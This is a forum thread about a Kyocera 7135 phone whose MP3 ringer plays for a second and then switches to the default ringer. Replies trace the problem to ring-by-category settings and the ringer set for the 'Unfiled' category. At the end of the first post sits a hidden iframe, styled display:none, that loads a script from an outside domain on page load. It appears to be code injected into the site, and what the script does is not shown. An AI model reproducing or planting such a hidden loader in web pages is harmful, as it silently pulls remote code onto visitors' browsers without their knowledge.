+ Reply to Thread
Results 1 to 6 of 6
  1. #1
    Registered User
    Join Date
    04-18-2003
    Posts
    63

    Here's a new one

    I have an MP3 set up as a ringer (from the file section) when I receive a call, it plays the MP3 file for a second, then goes into a standard ringer. Does that make sense? Do I have to change a setting or something?
    TIA<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Join Date
    10-14-2002
    Posts
    217
    You probably have 'ring by category' set. The first ring will be your default ringer, then by the second you'll have the appropriate caller ID information, and the ring will change. If you disable ring by category, you should be ok.
    -M
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

  3. #3
    Registered User
    Join Date
    04-18-2003
    Posts
    63
    Sir, you are correct. I thank you. My only question is, why would it happen if I receive a call from another catergory? I had a ringer set up for if my work called, but the circumstance I described earlier occured when I would receive a call from anyone, Any ideas why? Thanks for responding!

  4. #4
    Registered User
    Join Date
    01-01-2003
    Posts
    16

    Question default ringer

    Hi. I just got my 7135 last week, and I believe I am having the same problem. I have my phone set up to ring by category. The problem I am having happens when someone calls who is not in a category. The ringer I selected as my "Ringer Type" plays for a second and then the default Kyocera Ringer plays. Does anyone have an idea why this is happening? Do I have to assign all the entries in my address book to a category?

  5. #5
    Fully Converged
    Join Date
    11-23-2003
    Location
    Waipio Gentry, HI
    Posts
    45
    What do you have for the"Unfiled catagory"?
    7135 to 650

  6. #6
    Registered User
    Join Date
    01-01-2003
    Posts
    16
    Ah, I think that was my problem. I hadn't assigned anything for the "Unfiled category". I just looked at it and the default ringer for the "Unfiled category" was the Kyocera Ringer which is what I was getting. I just changed it, and I am hoping that was my problem. Thanks so much! I'm still learning about my 7135.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts